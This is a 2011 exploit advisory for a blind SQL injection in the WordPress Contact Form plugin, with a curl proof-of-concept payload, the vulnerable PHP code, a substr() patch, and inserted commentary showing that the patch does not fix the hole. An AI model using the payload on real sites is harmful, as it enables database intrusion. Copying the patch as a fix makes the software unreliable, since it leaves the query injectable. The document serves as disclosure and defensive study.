WordPress Contact Form 2.7.5 SQL Injection / Patch

Posted Oct 14, 2011
Authored by Skraps

WordPress Contact Form plugin versions 2.7.5 and below suffer from a remote SQL injection vulnerability. A patch is included.

tags | exploit, remote, sql injection
MD5 | 45618e3593eb3c3739b9db1eeab3c557

# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

---------------
Vulnerable code
---------------
Line 49:
public function the_content($content) {
    global $wpdb;
    global $table_name;
    global $settings_table_name;

    $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

    if ($_POST['wpcf_easyform_submitted'] == 1) {

        // Injection point: the POST value is concatenated straight into the SQL
        // string, with no integer cast, escaping or $wpdb->prepare() call.
        $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
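To make the difference between the advisory's substr() patch and a real fix concrete, here is an added, self-contained PHP model; it is not code from the plugin or from the advisory author. It builds the same form-lookup query three ways (from the raw POST value as at line 49, from the value after the patch's substr(), and from an integer-validated value) and runs each over a constructed benign id and the advisory's PoC payload, so nothing touches a database. TABLE_NAME is a constructed stand-in for the plugin's global $table_name; inside WordPress the validated path would instead be $wpdb->prepare("SELECT * FROM $table_name WHERE ID = %d", $id).

```php
<?php
declare(strict_types=1);

// Added example, not code from the plugin or the advisory: a WordPress-free model of
// the line 49 lookup built three ways, so the effect of each approach on the PoC input
// can be seen without a database. TABLE_NAME is a constructed stand-in for $table_name.
const TABLE_NAME = 'wp_contact_form';

// (1) As shipped in 2.7.5: the raw POST value is concatenated into the SQL string.
function query_vulnerable(string $raw_id): string
{
    return 'SELECT * FROM ' . TABLE_NAME . ' WHERE ID = ' . $raw_id;
}

// (2) As in the advisory's patch: substr() drops two characters, then concatenates.
//     Nothing checks what the remaining characters are.
function query_patched_substr(string $raw_id): string
{
    $id = substr($raw_id, 2);
    return 'SELECT * FROM ' . TABLE_NAME . ' WHERE ID = ' . $id;
}

// (3) Hardened: the form id is an integer column, so accept only a non-negative
//     integer. Anything else yields null and the caller never runs a query.
//     In WordPress the equivalent is $wpdb->prepare('... WHERE ID = %d', $raw_id),
//     which casts the argument to an integer before it is placed in the query.
function query_hardened(string $raw_id): ?string
{
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return null;
    }
    return 'SELECT * FROM ' . TABLE_NAME . ' WHERE ID = ' . $id;
}

// Constructed inputs: a benign id and the advisory's PoC value for wpcf_easyform_formid.
$inputs = [
    'benign'      => '1',
    'PoC payload' => '1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)',
];
$builders = [
    'vulnerable'   => 'query_vulnerable',
    'substr patch' => 'query_patched_substr',
    'hardened'     => 'query_hardened',
];

foreach ($builders as $label => $builder) {
    foreach ($inputs as $kind => $raw) {
        $sql = $builder($raw);
        printf("%-12s | %-11s | %s\n", $label, $kind,
            $sql === null ? 'rejected, no query built' : $sql);
    }
}
```

Run it with php on the command line. The hardened builder refuses the PoC input outright and passes the benign id through as the integer 1, while the substr() variant turns the legitimate id 1 into an empty string (a syntactically broken query for every normal submission) and merely truncates the payload to AND 1=IF(...), which is still attacker-controlled SQL text rather than a validated value.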

---------------
Patch
---------------

*** ./easy-form.class.php.orig 2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php 2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {
!
! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

$continue = true;

--- 54,63 ----
$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {
! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);
!
! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);

$continue = true;

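Review bot: the replacement line `$wpcf_easyform_formid=substr($wpcf_easyform_formid,2);` does not sanitize the value, it only discards its first two characters, and the following line still concatenates the result unescaped into `"SELECT * FROM $table_name WHERE ID = "`, so the query remains injectable by anything that survives the trim; it also turns a legitimate short id such as the `formid=1` used in the advisory's own PoC into an empty string and a syntactically broken query. Since ID is an integer column, cast the input (`$wpcf_easyform_formid = absint($_POST['wpcf_easyform_formid']);`) or, better, parameterize it with `$wpdb->prepare("SELECT * FROM $table_name WHERE ID = %d", $_POST['wpcf_easyform_formid'])`. Reading `$_POST['wpcf_easyform_formid']` without an `isset()` guard is also carried over unchanged.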
***************
*** 71,80 ****
if ($continue) {

//loop through the fields of this form (read from DB) and build the message here
! $form_fields = $wpdb->get_results("
SELECT *
FROM $settings_table_name
! WHERE form_id = ".$_POST['wpcf_easyform_formid']."
ORDER BY position
");

--- 73,82 ----
if ($continue) {

//loop through the fields of this form (read from DB) and build the message here
! $form_fields = $wpdb->get_results("
SELECT *
FROM $settings_table_name
! WHERE form_id = ".$wpcf_easyform_formid."
ORDER BY position
");



Comments (1)

skraps

For some reason they took the original file off of wordpress and the page. hmmm. Here's the original file that was downloaded. www.mediafire.com/?vsc9uygo6a6830p

Comment by skraps
2011-10-14 18:31:06 UTC
